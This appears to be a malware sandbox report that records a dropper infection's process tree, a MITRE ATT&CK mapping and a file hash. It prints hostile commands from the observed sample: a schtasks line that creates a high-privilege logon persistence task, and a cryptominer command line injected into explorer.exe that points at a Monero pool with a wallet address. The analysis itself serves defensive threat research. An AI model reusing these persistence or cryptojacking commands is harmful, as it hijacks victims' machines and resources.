C:\Users\Admin\AppData\Roaming\4542136.exe
"C:\Users\Admin\AppData\Roaming\4542136.exe"
12⤵
PID:6680

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 6680 -s 2460
13⤵
- Program crash
PID:9668

C:\Users\Admin\Documents\7Wsoky01pxuaUmOfwOjqt6Ss.exe
"C:\Users\Admin\Documents\7Wsoky01pxuaUmOfwOjqt6Ss.exe"
11⤵
PID:5360

C:\Users\Admin\AppData\Roaming\8555344.exe
"C:\Users\Admin\AppData\Roaming\8555344.exe"
12⤵
PID:6608

C:\Users\Admin\AppData\Roaming\5902677.exe
"C:\Users\Admin\AppData\Roaming\5902677.exe"
12⤵
PID:5216

C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -u -p 5216 -s 2352
13⤵
- Program crash
PID:5628

C:\Users\Admin\AppData\Roaming\5964461.exe
"C:\Users\Admin\AppData\Roaming\5964461.exe"
12⤵
PID:3376

C:\Users\Admin\AppData\Roaming\4210999.exe
"C:\Users\Admin\AppData\Roaming\4210999.exe"
12⤵
PID:5632

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5632 -s 2452
13⤵
- Program crash
PID:2796

C:\Users\Admin\Documents\g7ouyvL9Jsfipaxs9vxw7ZMG.exe
"C:\Users\Admin\Documents\g7ouyvL9Jsfipaxs9vxw7ZMG.exe"
11⤵
PID:4768

C:\Users\Admin\Documents\g7ouyvL9Jsfipaxs9vxw7ZMG.exe
"C:\Users\Admin\Documents\g7ouyvL9Jsfipaxs9vxw7ZMG.exe"
12⤵
PID:7008

C:\Users\Admin\Documents\w5rhGqq4QqT2Kwp1CxeK9Gjr.exe
"C:\Users\Admin\Documents\w5rhGqq4QqT2Kwp1CxeK9Gjr.exe"
11⤵
PID:3752

C:\Users\Admin\AppData\Local\Temp\RarSFX0\DPRwKy.exe
"C:\Users\Admin\AppData\Local\Temp\RarSFX0\DPRwKy.exe"
12⤵
PID:6260

C:\Users\Admin\AppData\Local\Temp\RarSFX0\UopEIp.exe
"C:\Users\Admin\AppData\Local\Temp\RarSFX0\UopEIp.exe"
12⤵
PID:7128

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 7128 -s 280
13⤵
- Program crash
PID:12028

C:\Users\Admin\Documents\ELqpiTXPINxP8mXUSz48EV6Z.exe
"C:\Users\Admin\Documents\ELqpiTXPINxP8mXUSz48EV6Z.exe"
11⤵
PID:5088

C:\Users\Admin\Documents\ELqpiTXPINxP8mXUSz48EV6Z.exe
"C:\Users\Admin\Documents\ELqpiTXPINxP8mXUSz48EV6Z.exe" -u
12⤵
PID:6188

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\wxcvhg13.d5f\gcleaner.exe /mixfive & exit
9⤵
PID:3752

C:\Users\Admin\AppData\Local\Temp\wxcvhg13.d5f\gcleaner.exe
C:\Users\Admin\AppData\Local\Temp\wxcvhg13.d5f\gcleaner.exe /mixfive
10⤵
PID:3088

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3088 -s 280
11⤵
- Program crash
PID:5968

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\mjpxenv1.k5z\autosubplayer.exe /S & exit
9⤵
PID:1200

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\0qosaei5.ftu\installer.exe /qn CAMPAIGN=654 & exit
9⤵
PID:5468

C:\Users\Admin\AppData\Local\Temp\0qosaei5.ftu\installer.exe
C:\Users\Admin\AppData\Local\Temp\0qosaei5.ftu\installer.exe /qn CAMPAIGN=654
10⤵
PID:5284

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\iuazdd2v.40j\app.exe /8-2222 & exit
9⤵
PID:4080

C:\Users\Admin\AppData\Local\Temp\iuazdd2v.40j\app.exe
C:\Users\Admin\AppData\Local\Temp\iuazdd2v.40j\app.exe /8-2222
10⤵
PID:1368

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1368 -s 276
11⤵
- Program crash
PID:5416

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Fri155442fc38b.exe
4⤵
- Suspicious use of WriteProcessMemory
PID:4920

C:\Users\Admin\AppData\Local\Temp\7zS4FE09193\Fri155442fc38b.exe
Fri155442fc38b.exe
5⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3232

C:\Users\Admin\AppData\Roaming\3155661.exe
"C:\Users\Admin\AppData\Roaming\3155661.exe"
6⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3800

C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -u -p 3800 -s 1916
7⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: EnumeratesProcesses
PID:5196

C:\Users\Admin\AppData\Roaming\5554559.exe
"C:\Users\Admin\AppData\Roaming\5554559.exe"
6⤵
- Executes dropped EXE
- Adds Run key to start application
PID:4860

C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe
"C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe"
7⤵
- Executes dropped EXE
- Suspicious behavior: SetClipboardViewer
PID:5888

C:\Users\Admin\AppData\Roaming\4132860.exe
"C:\Users\Admin\AppData\Roaming\4132860.exe"
6⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:452

C:\Users\Admin\AppData\Roaming\1018857.exe
"C:\Users\Admin\AppData\Roaming\1018857.exe"
6⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4452

C:\Users\Admin\AppData\Roaming\7570742.exe
"C:\Users\Admin\AppData\Roaming\7570742.exe"
6⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:5268

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5268 -s 2468
7⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: EnumeratesProcesses
PID:1692

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Fri15af75ee9b.exe
4⤵
- Suspicious use of WriteProcessMemory
PID:4784

C:\Users\Admin\AppData\Local\Temp\7zS4FE09193\Fri15af75ee9b.exe
Fri15af75ee9b.exe
5⤵
- Executes dropped EXE
PID:4188

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4188 -s 284
6⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: EnumeratesProcesses
PID:2472

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Fri1553f0ee90.exe
4⤵
- Suspicious use of WriteProcessMemory
PID:4456

C:\Users\Admin\AppData\Local\Temp\7zS4FE09193\Fri1553f0ee90.exe
Fri1553f0ee90.exe
5⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1164

C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe
"C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"
6⤵
- Executes dropped EXE
PID:3584

C:\Users\Admin\AppData\Local\Temp\Chrome 5.exe
"C:\Users\Admin\AppData\Local\Temp\Chrome 5.exe"
7⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:3964

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"' & exit
8⤵
PID:5620

C:\Windows\system32\schtasks.exe
schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"'
9⤵
- Creates scheduled task(s)
PID:6020

C:\Users\Admin\AppData\Roaming\services64.exe
"C:\Users\Admin\AppData\Roaming\services64.exe"
8⤵
- Executes dropped EXE
PID:5256

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"' & exit
9⤵
PID:1644

C:\Windows\system32\schtasks.exe
schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"'
10⤵
- Creates scheduled task(s)
PID:6824

C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe
"C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe"
9⤵
PID:2140

C:\Windows\explorer.exe
C:\Windows\explorer.exe --cinit-find-x -B --algo=rx/0 --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=xmr-eu2.nanopool.org:14433 --user=41o1Bi5waqLgbkV653RD7zSYeXSWRu1wnEDzPgFDFwntSnuRx7g4HbHPqNDGS6BW1bget6yyHyrPbBcVsdR6Ebxd843bMuK.add/password --pass= --cpu-max-threads-hint=30 --cinit-remote-config="v4Qq47ngFyBcSyO2uLKc6O4DG/ZgkwoY7/pmBv4ks3wJ7PR9JPsLklOJLkitFc6Y" --cinit-idle-wait=5 --cinit-idle-cpu=70 --tls --cinit-stealth
9⤵
PID:3084

C:\Users\Admin\AppData\Local\Temp\PublicDwlBrowser1100.exe
"C:\Users\Admin\AppData\Local\Temp\PublicDwlBrowser1100.exe"
7⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:4460

C:\Users\Admin\AppData\Roaming\8050610.exe
"C:\Users\Admin\AppData\Roaming\8050610.exe"
8⤵
- Executes dropped EXE
PID:5600

C:\Users\Admin\AppData\Roaming\5486143.exe
"C:\Users\Admin\AppData\Roaming\5486143.exe"
8⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:5724

C:\Users\Admin\AppData\Roaming\4089607.exe
"C:\Users\Admin\AppData\Roaming\4089607.exe"
8⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:5524

C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -u -p 5524 -s 2324
9⤵
- Program crash
PID:344

C:\Users\Admin\AppData\Roaming\7667268.exe
"C:\Users\Admin\AppData\Roaming\7667268.exe"
8⤵
PID:6052

C:\Users\Admin\AppData\Roaming\3069781.exe
"C:\Users\Admin\AppData\Roaming\3069781.exe"
8⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:1732

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1732 -s 2452
9⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: EnumeratesProcesses
PID:1212

C:\Users\Admin\AppData\Local\Temp\2.exe
"C:\Users\Admin\AppData\Local\Temp\2.exe"
7⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:1164

C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -u -p 1164 -s 1724
8⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: EnumeratesProcesses
PID:5664

C:\Users\Admin\AppData\Local\Temp\setup.exe
"C:\Users\Admin\AppData\Local\Temp\setup.exe"
7⤵
- Executes dropped EXE
PID:4916

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4916 -s 616
8⤵
- Program crash
PID:2904

C:\Users\Admin\AppData\Local\Temp\Pubdate.exe
"C:\Users\Admin\AppData\Local\Temp\Pubdate.exe"
7⤵
- Executes dropped EXE
PID:4540

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4540 -s 300
8⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: EnumeratesProcesses
PID:5128

C:\Users\Admin\AppData\Local\Temp\setup_2.exe
"C:\Users\Admin\AppData\Local\Temp\setup_2.exe"
7⤵
- Executes dropped EXE
PID:3588

C:\Users\Admin\AppData\Local\Temp\is-IKU58.tmp\setup_2.tmp
"C:\Users\Admin\AppData\Local\Temp\is-IKU58.tmp\setup_2.tmp" /SL5="$10210,140785,56832,C:\Users\Admin\AppData\Local\Temp\setup_2.exe"
8⤵
- Executes dropped EXE
- Loads dropped DLL
PID:3832

C:\Users\Admin\AppData\Local\Temp\setup_2.exe
"C:\Users\Admin\AppData\Local\Temp\setup_2.exe" /SILENT
9⤵
- Executes dropped EXE
PID:5372

C:\Users\Admin\AppData\Local\Temp\is-EUCKV.tmp\setup_2.tmp
"C:\Users\Admin\AppData\Local\Temp\is-EUCKV.tmp\setup_2.tmp" /SL5="$20210,140785,56832,C:\Users\Admin\AppData\Local\Temp\setup_2.exe" /SILENT
10⤵
- Executes dropped EXE
- Loads dropped DLL
- Drops file in Program Files directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
PID:5536

C:\Users\Admin\AppData\Local\Temp\3002.exe
"C:\Users\Admin\AppData\Local\Temp\3002.exe"
7⤵
- Executes dropped EXE
PID:1632

C:\Users\Admin\AppData\Local\Temp\3002.exe
"C:\Users\Admin\AppData\Local\Temp\3002.exe" -a
8⤵
- Executes dropped EXE
PID:5712

C:\Users\Admin\AppData\Local\Temp\jhuuee.exe
"C:\Users\Admin\AppData\Local\Temp\jhuuee.exe"
7⤵
- Executes dropped EXE
PID:4852

C:\Users\Admin\AppData\Local\Temp\BearVpn 3.exe
"C:\Users\Admin\AppData\Local\Temp\BearVpn 3.exe"
7⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:5192

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c APPNAME7.exe
4⤵
PID:5060

C:\Windows\System32\sihclient.exe
C:\Windows\System32\sihclient.exe /cv hT4RkUrQU0KJr6hWfqbv1w.0.2
1⤵
- Modifies data under HKEY_USERS
PID:4648

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 468 -p 4188 -ip 4188
1⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
- Suspicious use of WriteProcessMemory
PID:1180

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 440 -p 2340 -ip 2340
1⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
- Suspicious use of WriteProcessMemory
PID:1252

C:\Windows\system32\rundll32.exe
rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
1⤵
- Process spawned unexpected child process
PID:4644

C:\Windows\SysWOW64\rundll32.exe
rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
2⤵
- Loads dropped DLL
PID:4648

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4648 -s 460
3⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: EnumeratesProcesses
PID:2384

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 552 -p 4648 -ip 4648
1⤵
PID:2904

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 356 -p 4916 -ip 4916
1⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:1400

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 592 -p 4540 -ip 4540
1⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:724

C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -pss -s 604 -p 1164 -ip 1164
1⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:5408

C:\Windows\system32\rundll32.exe
rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
1⤵
- Process spawned unexpected child process
- Suspicious use of NtCreateProcessExOtherParentProcess
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: EnumeratesProcesses
PID:2904

C:\Windows\SysWOW64\rundll32.exe
rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
2⤵
- Loads dropped DLL
PID:5792

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5792 -s 452
3⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: EnumeratesProcesses
PID:5824

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 5792 -ip 5792
1⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:2440

C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -pss -s 448 -p 3800 -ip 3800
1⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:4344

C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -pss -s 516 -p 5524 -ip 5524
1⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:5904

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 568 -p 5268 -ip 5268
1⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:500

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 480 -p 1732 -ip 1732
1⤵
PID:6104

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 588 -p 5972 -ip 5972
1⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:5080

C:\Windows\system32\msiexec.exe
C:\Windows\system32\msiexec.exe /V
1⤵
- Enumerates connected drives
- Suspicious use of AdjustPrivilegeToken
PID:1660

C:\Windows\syswow64\MsiExec.exe
C:\Windows\syswow64\MsiExec.exe -Embedding 6CB0AFB996247CAEE607E1C2A3A14E4F C
2⤵
PID:6028

C:\Windows\syswow64\MsiExec.exe
C:\Windows\syswow64\MsiExec.exe -Embedding 2DD0A19B5B85D06936027A7BDD9FBC40
2⤵
PID:1580

C:\Windows\SysWOW64\taskkill.exe
"C:\Windows\SysWOW64\taskkill.exe" /im AdvancedWindowsManager* /f
3⤵
- Executes dropped EXE
- Kills process with taskkill
PID:1656

C:\Windows\syswow64\MsiExec.exe
C:\Windows\syswow64\MsiExec.exe -Embedding E6B5396C1BD70C2FE0DB6655E83C4773 E Global\MSI0000
2⤵
PID:5672

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:1552

C:\Windows\system32\rundll32.exe
rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
1⤵
- Process spawned unexpected child process
PID:5876

C:\Windows\SysWOW64\rundll32.exe
rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
2⤵
PID:5672

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5672 -s 452
3⤵
- Program crash
PID:5088

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 448 -p 5672 -ip 5672
1⤵
PID:5564

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 412 -p 3088 -ip 3088
1⤵
PID:3336

C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -pss -s 516 -p 2976 -ip 2976
1⤵
PID:2960

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 448 -p 3176 -ip 3176
1⤵
PID:2340

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 480 -p 1368 -ip 1368
1⤵
PID:5240

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 380 -p 1080 -ip 1080
1⤵
PID:5496

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 588 -p 1636 -ip 1636
1⤵
PID:6648

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 548 -p 2340 -ip 2340
1⤵
PID:6932

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 404 -p 5520 -ip 5520
1⤵
PID:6952

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 656 -p 5288 -ip 5288
1⤵
PID:6328

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
1⤵
PID:5172

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 692 -p 6052 -ip 6052
1⤵
PID:5280

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation -p -s SSDPSRV
1⤵
PID:3688

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 452 -p 6260 -ip 6260
1⤵
PID:6196

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo
1⤵
PID:3192

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 444 -p 1860 -ip 1860
1⤵
PID:1496

C:\Windows\system32\rundll32.exe
rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
1⤵
- Process spawned unexpected child process
PID:7348

C:\Windows\SysWOW64\rundll32.exe
rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
2⤵
PID:7376

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 7376 -s 460
3⤵
- Program crash
PID:7840

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 692 -p 7376 -ip 7376
1⤵
PID:7268

C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -pss -s 592 -p 6976 -ip 6976
1⤵
PID:8996

C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -pss -s 640 -p 5216 -ip 5216
1⤵
PID:7612

C:\Users\Admin\AppData\Local\Temp\C1CA.exe
C:\Users\Admin\AppData\Local\Temp\C1CA.exe
1⤵
PID:5056

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 444 -p 6680 -ip 6680
1⤵
PID:8880

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 692 -p 5492 -ip 5492
1⤵
PID:2152

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 380 -p 5632 -ip 5632
1⤵
PID:9836

C:\Users\Admin\AppData\Local\Temp\9400.exe
C:\Users\Admin\AppData\Local\Temp\9400.exe
1⤵
PID:10564

C:\Users\Admin\AppData\Local\Temp\B2A4.exe
C:\Users\Admin\AppData\Local\Temp\B2A4.exe
1⤵
PID:10332

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 10332 -s 304
2⤵
- Program crash
PID:11328

C:\Users\Admin\AppData\Local\Temp\DF14.exe
C:\Users\Admin\AppData\Local\Temp\DF14.exe
1⤵
PID:3804

C:\Users\Admin\AppData\Local\Temp\DF14.exe
"C:\Users\Admin\AppData\Local\Temp\DF14.exe"
2⤵
PID:12244

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3804 -s 1184
2⤵
- Program crash
PID:12284

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 628 -p 10332 -ip 10332
1⤵
PID:4100

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 640 -p 3804 -ip 3804
1⤵
PID:11484

C:\Users\Admin\AppData\Local\Temp\1CE9.exe
C:\Users\Admin\AppData\Local\Temp\1CE9.exe
1⤵
PID:7964

C:\Users\Admin\AppData\Local\Temp\5E0A.exe
C:\Users\Admin\AppData\Local\Temp\5E0A.exe
1⤵
PID:9964

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 356 -p 7128 -ip 7128
1⤵
PID:10780

C:\Users\Admin\AppData\Local\Temp\C457.exe
C:\Users\Admin\AppData\Local\Temp\C457.exe
1⤵
PID:3628

C:\Users\Admin\AppData\Local\Temp\EE85.exe
C:\Users\Admin\AppData\Local\Temp\EE85.exe
1⤵
PID:9156

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 9156 -s 276
2⤵
- Program crash
PID:13908

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 600 -p 9156 -ip 9156
1⤵
PID:13068

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 600 -p 4860 -ip 4860
1⤵
PID:14160

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 692 -p 14652 -ip 14652
1⤵
PID:14528

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 692 -p 2992 -ip 2992
1⤵
PID:16452

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 496 -p 17540 -ip 17540
1⤵
PID:19140

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 420 -p 19028 -ip 19028
1⤵
PID:18256

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 456 -p 17084 -ip 17084
1⤵
PID:18796

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 628 -p 21032 -ip 21032
1⤵
PID:14600

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 496 -p 1448 -ip 1448
1⤵
PID:21464

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 700 -p 23548 -ip 23548
1⤵
PID:23012

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 460 -p 25492 -ip 25492
1⤵
PID:18256

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 496 -p 10744 -ip 10744
1⤵
PID:17932

C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -pss -s 460 -p 8268 -ip 8268
1⤵
PID:21656

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 496 -p 7280 -ip 7280
1⤵
PID:27552

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 356 -p 20688 -ip 20688
1⤵
PID:22244

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 696 -p 22212 -ip 22212
1⤵
PID:4728

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 600 -p 25248 -ip 25248
1⤵
PID:4808

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 628 -p 25896 -ip 25896
1⤵
PID:24664

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 380 -p 15188 -ip 15188
1⤵
PID:21652

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 644 -p 30200 -ip 30200
1⤵
PID:27784

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 712 -p 33584 -ip 33584
1⤵
PID:27692

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 644 -p 31260 -ip 31260
1⤵
PID:20452

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 420 -p 31800 -ip 31800
1⤵
PID:9992

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 628 -p 24264 -ip 24264
1⤵
PID:13000

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 592 -p 6596 -ip 6596
1⤵
PID:24200

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Scheduled Task

T1053

Persistence

Registry Run Keys / Startup Folder

T1060

Scheduled Task

T1053

Privilege Escalation

Scheduled Task

T1053

Defense Evasion

Virtualization/Sandbox Evasion

T1497

Modify Registry

T1112

Install Root Certificate

T1130

Credential Access

Credentials in Files

T1081

Discovery

Software Discovery

T1518

Query Registry

T1012

Virtualization/Sandbox Evasion

T1497

System Information Discovery

T1082

Peripheral Device Discovery

T1120

Lateral Movement

Collection

Data from Local System

T1005

Exfiltration

Command and Control

Web Service

T1102

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\2.exe
MD5
f135dce6c8a88731a01efcce9a81478d

